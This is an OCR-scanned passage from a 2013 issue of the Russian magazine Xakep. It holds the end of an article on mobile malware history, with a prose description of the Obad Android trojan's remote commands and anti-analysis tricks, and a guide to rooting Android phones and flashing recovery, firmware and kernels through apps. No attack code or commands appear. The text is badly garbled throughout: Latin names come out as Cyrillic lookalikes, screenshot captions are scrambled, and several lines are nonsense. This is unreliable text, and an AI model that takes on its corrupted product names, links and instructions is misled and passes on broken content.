из новшеств которой стала автоматическая проверка любого 
устанавливаемого не через Соодіе РІау приложения на вирусы 
через удаленный сервис. 

Трудно сказать, использовала ли Соодіе купленный 
ѴігизТоІаІ для этой задачи, или у них есть собственный сервис 
проверки, однако не нужно быть сотрудником Соодіе, чтобы по- 
нять, что ѴігизТоІаІ так или иначе был использован для защиты 
АпсІгоісІ от вирусов. 

САМЫЙ ПРОДВИНУТЫЙ ТРОЯН 

В июне этого года сотрудники «Лаборатории Касперского» об- 
наружили наиболее продвинутый в техническом плане троян 
для АпсІгоісІ из всех, что встречались до этого. Троян получил 
имя ВасксІоог.АпсІгоісІОЗ.ОЬасІ.а. Это было независимое при- 
ложение, не внедряемое в легитимный софт и, судя по всему, 
распространяемое под видом известных приложений. 

После соглашения пользователя с длинным списком полно- 
мочий, установки и запуска он запрашивал права администра- 
тора устройства (речь идет не о гооТ а о собственной системе 
безопасности АпсІгоісІ), которые были нужны только для двух 
вещей: самостоятельной блокировки экрана и защиты от уда- 
ления. Последнее троян делал особенно изысканно. Исполь- 
зуя ранее неизвестный баг в АпсІгоісІ, он удалял себя из списка 
приложений с полномочиями администратора, из-за чего его 
невозможно было лишить этих прав и, как следствие, удалить. 



Далее троян проверял в системе наличие прав гооі: 
и при следующем подключении кѴѴі-Рі-сети отправлял инфор- 
мацию об устройстве на удаленный сервер. Информация была 
типична для такого рода приложений и содержала в себе номер 
телефона, ІМЕІ, МАС-адреса и подобную информацию. В ответ 
он получал список команд для исполнения и заносил их в базу 
данных с пометкой о времени исполнения. Удаленными коман- 
дами могли быть: проверка баланса, отправка сообщений, 
переход в режим проксирования трафика, скачивание и уста- 
новка приложений, отправка файлов по ВІиеІооІІі, открытие 
шелла и другие. Плюс ко всему при каждом подключении к дру- 
гому устройству по синему зубу он копировал сам себя на это 
устройство. 

При попытке анализа кода трояна обнаружилось использо- 
вание множества техник защиты от анализа. Во-первых, троян 
эксплуатировал неизвестный ранее баг в утилите сІех2]аг, из-за 
которого декомпиляция кода трояна происходила некоррек- 
тно. Во-вторых, троян использовал еще один неизвестный баг 
в АпсІгоісІ, позволяющий создать файл МапіТезІ.хплІ, в котором 
содержится метаинформация о приложении, таким образом, 
чтобы он противоречил стандартам Соодіе, но при этом коррек- 
тно обрабатывался при запуске приложения. Из-за этого мно- 
гие инструменты анализа просто не срабатывали. 

Если же удавалось распаковать и декомпилировать код тро- 
яна, обойдя эти ограничения, то дальше приходилось иметь 
дело с многоуровневой системой шифрования, которая защи- 
щала от анализа все текстовые данные, а также имена методов 
(они тоже были строками и вызывались посредством рефлек- 
сии). Интересно, что ключом для первого слоя шифрования 
была строка с главной страницы ТасеЬоок.сопл, из-за чего ра- 
боту трояна невозможно было проанализировать в «стерильной 
комнате», без подключения к интернету (хотя ограничение, ко- 
нечно, можно обойти с помощью прокси). 

ВЫВОДЫ 

Количество вирусов для АпсІгоісІ сегодня исчисляется тысяча- 
ми, и некоторые из них действительно представляют интерес 
для исследователя как образцы хорошего программирования 
и знания архитектуры АпсІгоісІ. Вот только бояться их не стоит. 
Автор данной статьи уже четвертый год использует смартфоны 
на АпсІгоісІ без всяких антивирусов и ни разу не поймал на них 
заразу. Главное — читать полномочия приложений и ставить их 
только из маркета. ИНИ 




Доклад с конферен- 
ции РЕРСОЫ 18, по- 
священный первому 
серьезному руткиту 
для АпсІгоісІ: 
аоо.аІ/ѴѴМОШг 

То самое сообщение 
на гесШ об обна- 
ружении трояна 
ОгоісЮгеат: 

аоо.аІ/МпТсЬ 



А КАК ЖЕ ДРУГИЕ МОБИЛЬНЫЕ ОС? 



Настоящая история мобильных вирусов нача- 
лась задолго до появления АпсІгоісІ — в те вре- 
мена, когда на рынке господствовали ЗутЬіап 
и ѴѴіпсІоѵѵз СЕ. Еще в 2004 году хакерская ко- 
манда 29А продемонстрировала пример червя 
для ЗутЬіап Зегіез 60, названного впоследствии 
СаЬіг (ѴѴогпл.ЗуплЬОЗ. СаЬіг). Червь распростра- 
нялся через ВІиеІооЫі и не совершал никаких 
зловредных действий, только демонстрировал 
сообщение «СагіЬе» после включения смарт- 
фона. Участники 29А разослали вирус ведущим 
антивирусным компаниям как пример, а затем 
опубликовали его исходный код, из-за чего впо- 
следствии появилось несколько модификаций 
червя, на этот раз найденных «в дикой природе». 

Затем был обнаружен первый вирус для си- 
стем на базе ѴѴіпсІоѵѵз СЕ под названием Ѵігиз. 
ѴѴіпСЕ.ЭиІіЗ. Он поражал РоскеіРС 2000, РоскеІРС 
2002, РоскеіРС 2003, не умел распространяться 
через ВІиеІооШ или ММ5, но инфицировал все 
найденные приложения на самом устройстве. 
Как и СаЬіг, он был детищем 29А и также был соз- 
дан для демонстрации возможности существова- 
ния подобного рода зловредов. 



Спустя месяц для ѴѴіпсІоѵѵз СЕ был обнару- 
жен первый бэкдор: ВасксІоог.ѴѴіпСЕ.ВгасІог. 

После запуска зловред прописывался в автоза- 
грузку, а затем открывал сетевой порт и ожидал 
удаленные подключения. Бэкдор поддерживал 
такие команды, как получение списка файлов 
на устройстве, загрузка файла, показ ЗМЗ-сооб- 
щений, получение файла с устройства и выпол- 
нение определенной команды. 

Практически сразу после ВгаЬог был найден 
и первый ЗМЗ-троян, в этот раз для ЗутЬіап. 
Он распространялся в составе простой игры 
Моздиііоз, в честь которой и получил свое имя — 
Тгоіап.ЗутЬОЗ.МоздиіЬа. После запуска он на- 
чинал рассылку сообщений на премиум-номера. 
Работоспособность игры при этом полностью 
сохранялась, а ее титульный экран был украшен 
сообщением о том, что игра была крякнута неким 
ЗСЮйОМ ВІІЧ І_ОАЭЕВ. 

Впоследствии количество известных вирусов 
начало стремительно возрастать, и многие из них 
использовали многочисленные уязвимости 
в ЗутЬіап. Например, Тго]ап.5утЬОЗ.І_оскпи1:, 
получивший известность в России как Соѵпо, 



использовал некорректную проверку исполня- 
емых файлов, чтобы блокировать работу всей 
ОС. Тгоіап.ЗутЬОЗ.РопіаІ заменял системные 
шрифты на модифицированные версии, из-за 
чего ОС также отказывалась загружаться. Тгоіап. 
ЗутЬОЗ.Оаплрід и Тгоіап.ЗутЬОЗ.НоЫІе подме- 
няли системные приложения, а Тгоіап.ЗуплЬОЗ. 
йгеѵег был способен блокировать работу антиви- 
русных приложений. 

После того как на сцене появилась ІОЗ, не- 
которые вирусописатели попытались переклю- 
читься на нее. Однако из-за параноидальной 
закрытости АРІ ОС и невозможности установить 
приложения из сторонних источников эпиде- 
мии не произошло. Немногочисленные вирусы 
были ориентированы на взломанные устройства 
и в основном выводили на экран различные ре- 
кламные и фишинговые сообщения. Наиболее 
примечательным стало разве что появление тро- 
яна в самом Арр Зіюге. Приложение под назва- 
нием РіпсІ апсі саІІ, обладая функционалом ѴоІР- 
клиента, при этом совершало такие действия, 
как копирование контактов на удаленный сервер 
и рассылка спама (на русском языке, кстати). 
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КИПИТ РАБОТА 
НА М ЕСТАХ 

Прошиваем , обновляем и тюнингуем 
смартфон , не покидая Апйгоій 

Несколько лет назад такие операции, как рутинг, прошивка и тюнинг АпсІгоісІ-смартфона, требо- 
вали достаточно глубоких знаний, специальных инструментов, совместимых только с настоль- 
ной ѴѴіпбоѵѵз, и массу терпения. Сегодня все стало намного проще и все эти действия можно 
выполнить с помощью специального софта, доступного прямо в (Зоодіе РІау. 



ВВЕДЕНИЕ 

Обычно установка альтернативной прошивки на девственно чи- 
стый смартфон выглядит примерно так: сначала ты находишь 
в Соодіе информацию по рутингу своей модели смартфона, 
затем обзаводишься необходимыми инструментами (АпсІгоісІ 
ЗЭК, абЬ, ТазТЬооТ, скрипты), подключаешь смартфон к компу 
и пытаешься как можно точнее выполнить инструкции. Если все 
удалось, ты получаешь гооі: и, в некоторых случаях, в довесок 
кастомную консоль восстановления. 

Далее следует установить прошивку. Для этого ты вновь 
погружаешься в интернет и, спустя полчаса хождения по фору- 
мам и чтения информации о совместимости, находишь и ска- 
чиваешь гір-архив с прошивкой. Снова подключаешь смартфон 
к компу и скидываешь на него прошивку. Затем ты выключаешь 
смартфон, включаешь его, зажав кнопки уменьшения гром- 
кости и включения, и получаешь доступ к консоли восстанов- 
ления. Пять минут походив по меню с помощью клавиш гром- 
кости, ты находишь свою прошивку на карте памяти и даешь 
команду на установку. 

После окончания установки ты перезагружаешь смартфон 
и молишься, чтобы все получилось. Когда на экране появляется 
рабочий стол, ты с облегчением выдыхаешь и тут же вспомина- 
ешь, что забыл скачать и установить приложения Соодіе и ядро. 
Что ж, для этого ты еще полчаса проводишь в интернете, нахо- 
дишь искомые 2ір’ы, скидываешь их на карту памяти, дальше 
консоль восстановления, тыканье по меню, ожидание со скре- 
щенными пальцами, и вот оно, рабочий стол... блин, надо было 
устанавливать другую прошивку... 

Знакомая картина? Если да, то эта статья для тебя. Из нее 
ты узнаешь, как проделать все то же самое за десять минут, 
подключив смартфон к компу только один раз на две минуты. 

ЧТО ТЫ ХОЧ ЕШ Ь И ЧТО ТЫ ПОЛ УЧ ишь? 

Итак, предположим, что ты держишь в руках совершенно но- 
вый смартфон. Твоя задача — установить на него СуаподепМосІ 
(как вариант — АОКР, РагапоісІАпсІгоісІ или популярный 
ЗирегѴазуаАпсІгоісІМосІРІиз) и ядро Тгапсо.кегпеІ. И тот и другой 
распространяются в прошиваемых через консоль восстанов- 
ления 2ір-файлах. Однако обычная консоль их не примет из-за 
кривой цифровой подписи («не производителя это подпись, 



прощайте»). Поэтому тебе нужна кастомная консоль восстанов- 
ления, которая не обращает внимания на цифровые подписи. 
Это может быть СІоскѵѵогкМосІ или ТѴѴПР. 

Но! Чтобы установить кастомную консоль восстановления, 
нужны права записи во внутреннюю память смартфона, то есть 
нужен гооі:. А гооі: в «не ІЧехиз» устройствах всегда получают 
с помощью взлома защиты АпсІгоісІ. Итого в целом картина дей- 
ствий выглядит так: получение гооі: — > установка консоли вос- 
становления — > прошивка СуаподепМосІ — > прошивка приложе- 
ний Соодіе — > прошивка ядра — > перезагрузка — > радость. Давай 
посмотрим, как все это сделать. 




Евгений Зобнин 

ехесЬіІ.ги 
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<[0| Обновления 


VII 


■ ;ЕЗІ Тгапсо.КегпеІ ирбаТег 





Проверка обновлений 

Вручную 



Тип обновления 

Новые версии (Только стабильные) 



ДОСТУПНЫЕ ОБНОВЛЕНИЯ 



Последняя проверка не обнаружила доступных 
обновлений. Чтобы проверить наличие 
обновлений вручную, нажмите кнопку 
"Обновить" 



В СуаподепМосІ есть собственный механизм 
ОТА-обновления прошивки 



І'гапсо.КегпеІ ирбаТег Ргее ѵ5.1 .1 

СоругідНі (С) 201 1 -201 3 - Ргапсізсо Ргапсо 
Ваше устройство: зирроПеб! 

СІіск Неге Іо ореп іНе тепи. 



Виу ТиІІ ѵегзіоп 

СІіск Неге Іо Ьиу ІНе ТиІІ ѵегзіоп оі іНіз арріісаііоп 
іНа! Наз тоге Геаіигез іНап уои сап роззіЫу 
ітадіпе. И ѵѵіІІ таке уои а ігие Соб оѵег уоиг 
беѵісе. 



ГЛАВНОЕ МЕНЮ 



Обновление ядра Франко 

Здесь Вы проверяете обновления ядра 
Франко, скачиваете их и прошиваете на 
свое усмотрение. 



Бесплатная версия Тгапсо.ирбаіег не умеет 
ничего, кроме установки и обновления ядра 







Х-МоЫІе 
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* Весоѵегу ЗеШр 

Ѵои ти$1 Ьаѵе іНе СІоскѵѵогкМосІ Весоѵегу 
іпзГаІІесІ Іо ЯазЬ апсі гезіоге ВОМз! 

А Загрузить режим Весоѵегу 

Перезагрузить телефон в режим Весоѵегу 

УПРАВЛЕНИЕ ПРОШИВКАМИ 
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То деі зІаПесІ изіпд ВОМ Мападег, уои 
тизі Игзі зеі ир а сизіот гесоѵегу. 

Зеі ир а сизіот гесоѵегу Ьу сЬоозіпд 
Ітот іИе орбопз Ьеіоѵѵ. 


ЕЭ Установить ВОМ с 50 карты 


щ 


^ Скачать прошивки 

Купите ВОМ Менеджер Премиум чтобы 
получить доступ к списку прошивок! 


ж 




/ч Проверить обновление 

V/ Текущий ВОМ: 10.1 -201 30724-МІбНТІ.Ѵ-тако 

РЕЗЕРВИРОВАНИЕ И ВОССТАНОВЛЕНИЕ 
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СІоскѵѵогкМосІ Весоѵегу 


Резервные копии 
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ВЕСОѴЕВѴ АЬВЕАОѴ ІИЗТАИЕО 


1 ■! Спхпянить тркѵіііий ВОМ 

Сделай летнее фото с хештегом Гп=і 

конкурса Набери много лайков и получи УЩІ 
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СІоскѵѵогкМосІ Весоѵегу 
Теат ѴѴіп Весоѵегу Ргоіесі (ТѴѴВР) 
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тѵѵкр ТѴѴВР Мападег 




тѵѵкр ТѴѴВР Мападег 





ТУ/ВР Мападег были предоставлены 
права Суперпользователя 



Восстановление информации 

Ведущие инженеры Красноярского края 



У Вооі 
СасМе 
^ Оаіа 
Весоѵегу 
•У Зузіет 

АпсІгоісІ Зесиге 
^ ЕпаЫе Сотргеззіоп 
Зкір ІѴЮ5 (Зепегаііоп 
РІеазе сЬоозе Ьаскир Іосаііоп: 

• Іпіегпаі Зіогаде Ехіегпаі Зіогаде 




РОМ Мападег предлагает нам установить СІоскѵѵогкМосІ Ресоѵегу 



ТѴѴНР Мападег: простой и удобный способ управления ТѴѴНР Ресоѵегу 



ноот 

Перво-наперво нам нужен гоо*. Сразу скажу, что это единствен- 
ная задача, для решения которой придется подключить смарт- 
фон к компу. Здесь уж ничего не поделаешь, система безопас- 
ности АпсІгоісІ не позволит сделать это АпсІгоісІ-приложению. 
С другой стороны, плеваться тоже не стоит, так как все делается 
очень быстро и безболезненно. Общий алгоритм действий вы- 
глядит так: 

1 . Заходим на телефоне в «Настройки — > О телефоне» и много 
раз подряд тыкаем в «Номер сборки» до тех пор, пока не по- 
явится сообщение «Теперь вы разработчик!», далее идем 
в «Настройки — »■ Для разработчиков» и ставим галочку «От- 
ладка по 115В» (если установлен АпсІгоісІ версии ниже 4.2, 
можно сразу идти в раздел для разработчиков). 

2. Подключаем смартфон к компу с помощью ІІЗВ-кабеля, 
на телефоне выбираем «Медиаустройство» (МТР) либо «Ка- 
мера» (РТР) и ждем, когда установятся драйверы. 

3. Качаем приложение іВооІ: ( аоо.аІ/СѵѵН1-Ѵ ) и запускаем. 

4. Нажимаем «Проверить подключение...». 

5. Нажимаем «Установить РООТ» и делаем, что пишет про- 
грамма. 



іНооІ — получаем гооі 

в один клик По заявлению украинских разработчиков, іВооІ: дей- 

ствует в отношении любого 
смартфона под управлением 
АпсІгоісІ 2. 3-4. 2. 2, а не только 
устройств от Ниаѵѵеі, как мож- 
но было подумать, скачав и за- 
пустив приложение. После за- 
вершения работы и нескольких 
перезагрузок на смартфоне 
должно появиться приложение 
ЗирегІІзег и, конечно же, гооі- 
доступ, который откроет нам 
путь для установки рекавери 
и прошивок. 



УСТАНОВКА ВЕСОѴЕВѴ 

Установить кастомную консоль 
восстановления между тем 
очень просто. Для этого в мар- 
кете есть куча приложений, 
но я бы рекомендовал исполь- 
зовать Песоѵегу-Тооіз, ПОМ 
Мападег или ТѴѴВР Мападег. 
Первая предназначена ис- 
ключительно для установки 
рекавери и, по сути, состо- 




ит всего из двух кнопок: РІазІі СІоскѵѵогктосІ Несоѵегу и РІазІі 
ТѴѴНР Несоѵегу. После нажатия одной из них будет установле- 
на та или иная консоль восстановления. В принципе, неважно, 
какую из них устанавливать, отличие разве что в том, что ТѴѴНР 
удобнее управлять пальцем, но и эта функция нам безразлич- 
на — самостоятельно рыться в их настройках мы не будем, а по- 
ложимся на специальный софт. 

По идее, Несоѵегу-Тооіз должна сама определить модель 
смартфона и скачать правильный архив с консолью, однако 
этот механизм срабатывает не всегда, да и база данных не- 
полная. Поэтому как запасной вариант можно использовать 
НОМ Мападег, предназначенный исключительно для установки 
СІоскѵѵогкМосІ, но зато включающий в себя исчерпывающую 
базу устройств. Опять же все, что нужно сделать, — это нажать 
на кнопку Несоѵегу ЗеШр — > СІоскѵѵогкМосІ Несоѵегу, подтвер- 
дить модель телефона и дождаться окончания установки. 

Если же и этот метод не сработал, то стоит обратить внима- 
ние на модель своего смартфона и убедиться, не китайская ли 
это поделка. Само собой разумеется, супердешевые китайские 
телефоны нельзя прошить таким образом. Никто их в базу вно- 
сить не будет, а заниматься поддержкой тем более. Поэтому 
в отношении китайцев придется применять старый дедовский 
способ ручной установки (да и то тебе сильно повезет, если 
на него вообще что-то будет портировано). 

УСТАНОВКАПРОШИВКИ 

Теперь, когда смартфон оснащен кастомной консолью вос- 
становления, он готов принять любую доступную для данной 
модели прошивку и проглотить ее, не поперхнувшись. Са- 
мостоятельно искать прошивки мы, конечно же, не станем. 
Мы автоматизируем этот процесс с помощью приложения 
СооМападег. Для тех, кто не в курсе: еще с самого начала рас- 
пространения кастомных прошивок в Сети появился сайт доо. 
ІШ- Изначально на нем размещался проприетарный гугловский 
софт (типа СпгіаіІ или маркета), который авторы кастомных 
прошивок не могли использовать из-за лицензионных ограни- 
чений, но затем он превратился в открытый репозиторий все- 
возможных прошивок, а еще через некоторое время появилось 
приложение СооМападег, позволяющее автоматически уста- 
навливать как прошивки, так и гугловские приложения. 

Это приложение замечательно тем, что дает выбор из до- 
ступных прошивок, основываясь на модели смартфона. В ре- 
зультате нам не придется ни самостоятельно искать прошив- 
ки, ни бояться за то, что какая-то из них может криво встать. 
В общем и целом алгоритм работы с приложением выглядит 
так: «Запуск — > Вгоѵѵзе СоплрайЫе ВОМз — ► выбор прошивки 
по имени (например, аокр или сил) — > выбор версии — ► Ведіп 
ЭоѵѵпІоасІ — > Огбег & ТІазИ зеіесѣесі —*■ РІазІі». И это все, прошивка 
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РІазЬ СІоскѵѵогктосІ Весоѵегу 






РІазЬ ТѴѴВР Весоѵегу 

МосІеІ: Мехиз 4 
Мате: тако 

ІІзіпд сісі Ьіпагу. Весоѵегу іп Р5: 

0 /сІеѵ/ЬІоск/рІаІІЪгт/тзт.зсІсс.І /Ьу- 
пате/гесоѵегу 



СооМападег собственной персоной 



СуапОеГІа позволяет скачать новую 
версию АпсІгоісІ, потратив всего 3 Мб 
трафика 



Весоѵегу-Тооіз: простой и удобный 
способ установки рекавери 



будет скачана, а затем установлена автоматически. Смартфон 
при этом перезагрузится. 

Установка или, если быть точным, доустановка приложений 
Соодіе производится еще проще: ОоѵѵпІоасІ даррз раскадез — ► 
Уез — ► Огбег & ТІазИ зеіесіесі. Хотя лучше, конечно же, скачать 
Саррз заранее, а лишь затем приступать к загрузке и установке 
прошивки. В таком случае на последнем шаге установки прошив- 
ки (Огбег & ТІазІі зеіесівсі) появится возможность выбрать пакет 
даррз, и он будет установлен вместе с прошивкой. Установка 
сразу нескольких пакетов возможна только при наличии ТѴѴРР 
Весоѵегу; в СІоскѵѵогкМоб эта функция заблокирована и работа- 
ет только в сочетании с платной версией утилиты ВОМ Мападег. 

Отмечу также, что по умолчанию СооМападег не делает 
вайп перед установкой прошивки, однако он это умеет. Поэтому 
каждый раз при кардинальной смене прошивки, то есть именно 
замене одной на другую, а не обновлении, в последнем окне 
(которое появляется после нажатия «Огбег & ТІазІі зеіесіеб») 
следует ставить флажок напротив опции «ѴѴіре баіа (Тасіогу 
гезеі:)». Так ты избежишь возможных проблем с загрузкой и ра- 
ботой новой прошивки. 

УСТАНОВКА ЯДРА 

Кроме кастомной прошивки, мы также можем поставить ка- 
стомное ядро. О том, что это такое, мы уже подробно расска- 
зывали в одном из предыдущих номеров. Если в двух словах, 
то кастомное ядро может дать более тонкий контроль над смарт- 
фоном, поднять его производительность и сохранить заряд 
батареи, однако здесь все далеко не так просто, как с прошив- 
ками, и без детального ознакомления с темой я бы не рекомен- 
довал прошивать кастомное ядро, а посоветовал ограничиться 
тем, которое идет в комплекте с прошивкой. 

Если же решение об установке ядра принято, то самое вре- 
мя заглянуть в Соодіе РІау. Для многих популярных кастомных 
ядер в свое время были разработаны специальные утилиты 
для управления и обновления, с помощью которых установить 
ядро можно также легко, как запустить почтовый клиент. Три из- 
вестные утилиты из этого списка: 

• Тгапсо.КегпеІ ирсіаіег — «обновлятор» и конфигуратор од- 
ного из самых известных ядер для девайсов линейки ІМехиз 
(поддерживаются Затзипд Саіаху Мехиз, І_С Мехиз 4, Азиз 
Соодіе Мехиз 7 и Затзипд Мехиз 10). Бесплатная версия 
умеет только устанавливать и обновлять ядро, но большего 
нам и не нужно; 

• Тгіпііу КегпеІ ТооІЬох — аналогичное решение для ядра 
Тгіпііу, поддерживающего все те же Мехиз-устройства, а так- 
же Затзипд Саіаху ІМоІе II и Саіаху 8 III. Помимо функции 
установки, также включает в себя инструменты управления 
всеми функциями ядра и стоит 114 рублей; 



• СІ_аРОЗ Сопітоі — практически копия предыдущего прило- 
жения, но в этот раз для, прямо скажем, не самого популяр- 
ного ядра СІаРОЗ (Саіаху Мехиз и Мехиз 7). Включает в себя 
полный комплект для тюнинга и автоматическую обновлял- 
ку. Стоит 81 рубль. 

Все эти приложения позволяют без лишних телодвижений 
установить одно из трех ядер. Но если деньги тратить не хо- 
чется или ты выбрал ядро, для которого просто нет управля- 
ющего приложения, то можно выйти из ситуации, скачав ядро 
прямо на телефон, а затем прошив его с помощью все того же 
СооМападег. Делается это так: 

1 . Идем на ХРА ( ^огит.хба-беѵеіорегз.сот ) или 4рба ( 4рба. 
Ш), находим свой девайс, выбираем ядро (да, придется по- 
копаться в многочисленных тредах) и скачиваем его на теле- 
фон. Обычно ядро весит 5-10 Мб, поэтому ждать придется 
недолго и стоить это будет копейки (если нет ѴѴі-Рі). 

2. Устанавливаем и запускаем любой файловый менеджер, 
переходим в каталог РоѵѵпІоасІ на карте памяти, находим ар- 
хив с ядром и копируем его в каталог доотападег, опять же 
в корне карты памяти. 

3. Запускаем СооМападег, жмем на пункт РІазИ ВОМз, ставим 
галочку напротив архива с ядром, жмем кнопку «Огбег & ТІазІі 
зеіесіесі», а на следующем экране, ничего не меняя, нажи- 
маем кнопку РІазІі. 

ОБНОВЛЕНИЕ ПРОШИВКИ, ЯДРА И САРРЗ 

К этому моменту у тебя уже должны быть кастомная консоль 
восстановления, кастомная прошивка, приложения Соодіе 
и кастомное ядро; фул-хаус, все, что только нужно. Однако 
долго на этом всем мы не просидим, и вскоре уже выйдут но- 
вые версии прошивок, основанные на новой версии АпсІгоісІ, 
еще более быстрые ядра и еще более фичастые консоли вос- 
становления. Короче говоря, нужно обновляться. Но как? 

Для обновления также предусмотрены свои собственные 
инструменты, но перед тем, как перейти к их обзору, поясню 
несколько специфичных моментов: 

• Консоль восстановления можно обновлять когда угодно 
и как угодно. Она находится в отдельном разделе, поэто- 
му, даже угробив этот раздел, ты не угробишь АпсІгоісІ. Об- 
новлять можно с помощью все тех же Ресоѵегу-Тооіз, РОМ 
Мападег и ТѴѴРР Мападег. 

• Ядро тоже находится в отдельном разделе, и его можно об- 
новлять/менять когда угодно и как угодно, главное — учиты- 
вать совместимость с версиями АпсІгоісІ и типами прошивок. 
Способы описаны выше. 

• Обновляется прошивка без всяких вайпов, однако, если 
было установлено кастомное ядро, его придется пере- 




ШРО 

ТѴѴРР Мападег 
позволяет выполнять 
практически 
все операции 
ТѴѴРР Ресоѵегу 
прямо из АпсІгоісІ: 
установку прошивок, 
вайп, бэкап 
и восстановление, 
перезагрузку 
в разных режимах. 







66 



Х-МоЫІе 



ХАКЕР 09/176/2013 



27-В©Х 54, 15:42 

^ 2013-07-25.09.21.19 Я І 

Восстановить Данные Инфо Изучить Рез. копию 


1 


27- В О х 54, 1 5:42 

^ 2013-07-25.09.21.19 Я І 

Восстановить Данные 


Основные атрибуты 




* Восстановить ^ 

Приложения+Данные 




'УОу/ 


2013-07-25.09.21.19 ^ 


У//// 






У////. 


Ш Везіоге Техі Меззадез 


СІоскѵѵогктосІ Васкир Туре 


У///, 


/згісаггі/сІоскѵѵогктосІ/Ьаскир/201 3-07-25. 09. 21. 19 


ж 


^ Везіоге СаІІ І_одз 


1,73 СВ 25.07.2013 15:40:31 


ш 


Везіоге ѴѴІРІ Ассезз Роіпіз 


В МЭ5 Сжать Конвертировать 


У//У/ 




р 


^ Везіоге ВІиеІооіЬ Раігіпдз 
ЛШ Кезіоге ІІзег ѴѴогсІ Оісііопагу 




р 


<$) Везіоге Вгоѵѵзег Оаіа 




УУу 


л г, ДМППЛІП ІГк 



26- < * ) О X 

•|р> Эе^аиІ! Васкир ЗеКіпдз 



РІеазе зе! уоиг сіеіаиіі 
зеДіпдз. 



Имя бекапа 
ІІТС Тітегопе ІМате 



Васкир Туре 
СІоскѵѵогктосІ 



Васкир Мосіе 
ЫогтаІ 



Заѵе І_оса!іоп 
/зсісагсі 



ѴаТСз2 аз Таг 

Васкир ѴаТСз2 рагШіопз аз Таг Гііез. 




27* # О X 

Э ІЧапсІгоісІ Васкир 



:1 9 Апаіузіпд Ьаііегу ІеѵеІ... 

:1 9 ЗиІТісіеп! ЬаКегу аѵаіІаЫе! 

:20 СЬескіпд ѵегзіоп оТ ВизуВох 
іпзіаііесі... 

1 5:21 :20 ВизуВох ѵегзіоп 1 .20 ог аЬоѵе 
іпзіаііесі! 

1 5:21 :20 ЗеагсЫпд 1"ог Зй сагсі... 

1 5:21 :20 АІ!егпа!е з!огаде тесііа ргоѵісіесі! 
1 5:21 :20 СЬескіпд !ог гедиігесі !ооіз... 

1 5:21 :20 АН гедиігесі Іооіз аѵаіІаЫе! 

1 5:21 :20 СЬескіпд сіізк зрасе... 

1 5:21 :20 Зй Сагсі Ргее Зрасе: 281 3 МВ 
1 5:21 :20 ВедиігесІ Зрасе: 1 807 МВ 
1 5:21 :20 Ыесеззагу сіізк зрасе аѵаіІаЫе! 

1 5:21 :20 йеіесііпд тоипІроіЫз Іо 
ехсіисіе... 

1 5:21 :21 Васкіпд ир !о /зсісагсі/ 
СІоскѵѵогктосІ/ 

Ьаскир/201 3-07-25.09.21. 19 
1 5:21 :21 /Ьооі по! РоипсІ! Зкірріпд Ьаскир 
о! /Ьооі! 

1 5:21 :21 Сопзісіег іпзіаіііпд раІсЬ ЛІе !ог 
уоиг сіеѵісе, Тог а сотріеіе папсігоісі! 
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ЫапсІгоісІ Мападег позволяет вытащить из бэкапа практически любые данные 



Опііпе ЫапсІгоісІ Васкир: делаем резервную копию прямо во время 
работы смартфона 




ШРО 

В прошивке 
АОКР есть масса 
скрытых настроек, 
активировать 
которые можно, 
установив бесплатное 
приложение АОКР.со. 



установить. Переустановка приложений Соодіе не требу- 
ется. 

• Переход на другую прошивку производится с полным вай- 
пом (Тасіогу гезеі:) и последующей доустановкой приложе- 
ний Соодіе и ядра. Все данные, кроме файлов на карте па- 
мяти, будут потеряны (этого можно избежать, сделав бэкап 
с помощью Неііит или Тііапіит Васкир). 

Теперь о том, как выполнять обновление. Рекавери и ядро 
обновляются с помощью специализированного софта либо, 
в случае использования редкого ядра, самостоятельного ска- 
чивания и прошивки вручную, как показано в предыдущем 
разделе. Обновлять прошивки можно разными способами. 
Если прошивка была установлена с помощью СооМападег, 
то при появлении новой версии в репозитории доо.іт тебе при- 
дет уведомление, нажав на которое можно скачать и устано- 
вить новую версию. Никаких данных и приложений ты при этом 
не потеряешь, останется переустановить только ядро. 

В СуаподепМосІ есть собственный механизм обновления, 
который также автоматически предупредит тебя о выходе но- 
вой версии и предложит скачать ее и установить. По умолчанию 
он работает только со стабильными версиями прошивки, но его 
можно переконфигурировать, так что предупреждения будут 
приходить и после выхода ночных сборок. Для этого идем в «На- 
стройки — ► О телефоне — > Обновление СуаподепМосІ». В опции 
«Проверка обновлений» выбираем «Ежедневно», в опции «Тип 
обновления» — «Новые версии (Включая ночные сборки)». 

Единственная проблема такого метода обновления в том, 
что каждая прошивка будет весить около 200 Мб — накладно, 
если производить обновления каждый день или несколько раз 
в неделю. Поэтому я бы рекомендовал использовать инструмент 
СуапОеНа, который позволяет выкачивать только патчи с изме- 
ненными компонентами прошивки вместо всего архива цели- 
ком. При использовании этого инструмента каждое обновление 
будет весить всего 2-10 Мб, так что для выкачивания подойдет 
даже сотовая сеть. Пользоваться очень просто: после первого 
запуска софтина предложит загрузить всю прошивку целиком 
(на нее в дальнейшем будут накладываться патчи), после чего 
повиснет в фоне и будет уведомлять о появлении обновлений. 

БЭКАП 

Чтобы уберечь себя от возможной кривой установки прошив- 
ки, следует регулярно делать бэкап. Для этого существует два 
основных типа инструментов: приложения Неііит и Тііапіипл 
Васкир для бэкапа приложений, а также специальная функция 
кастомных консолей восстановления под названием ІМапсІгоісі. 
Вторая отличается тем, что делает полный снимок всех ком- 
понентов смартфона так, что после любых действий смартфон 



можно будет вернуть к прежнему состоянию, включая все на- 
стройки, приложения, контакты и сообщения. 

Обычно бэкап ІМапсІгоісІ выполняется вручную прямо из меню 
кастомного рекавери, однако мы воспользуемся приложением 
Опііпе ІМапсІгоісІ Васкир, которое создает резервную копию си- 
стемы прямо во время ее работы. Приложение это бесплатное 
и доступно в Соодіе РІау. После установки оно установит скрипт 
бэкапа (это, кстати, придется делать после каждого обновле- 
ния прошивки) и предложит выполнить первоначальную на- 
стройку, которая сводится к выбору способа автогенерации 
имени бэкапа (по умолчанию текущее время), а также выбору 
формата бэкапа. Обычный СІоскѵѵогкМосІ-формат универсален 
и будет совместим с любым кастомным рекавери, однако если 
на смартфоне установлен именно СІоскѵѵогкМосІ, то в опции 
Васкир Мобе лучше выбрать СѴѴМ ІпсгетепіаІ. В этом случае 
каждая новая резервная копия будет содержать только отличия 
от предыдущей, из-за чего потеряется совместимость с 7ѴѴВР, 
но удастся сохранить солидный кусок свободного места на кар- 
те памяти. 

После того как все это будет сделано, достаточно нажать 
на кнопку Оиіск Васкир, и приложение начнет свою работу. 
Смартфоном в это время вполне себе можно пользоваться, 
так что не стоит откладывать бэкап на вечер или другое время. 
По окончании процедуры софтина сама выведет на экран сооб- 
щение об успешном завершении резервирования и предложит 
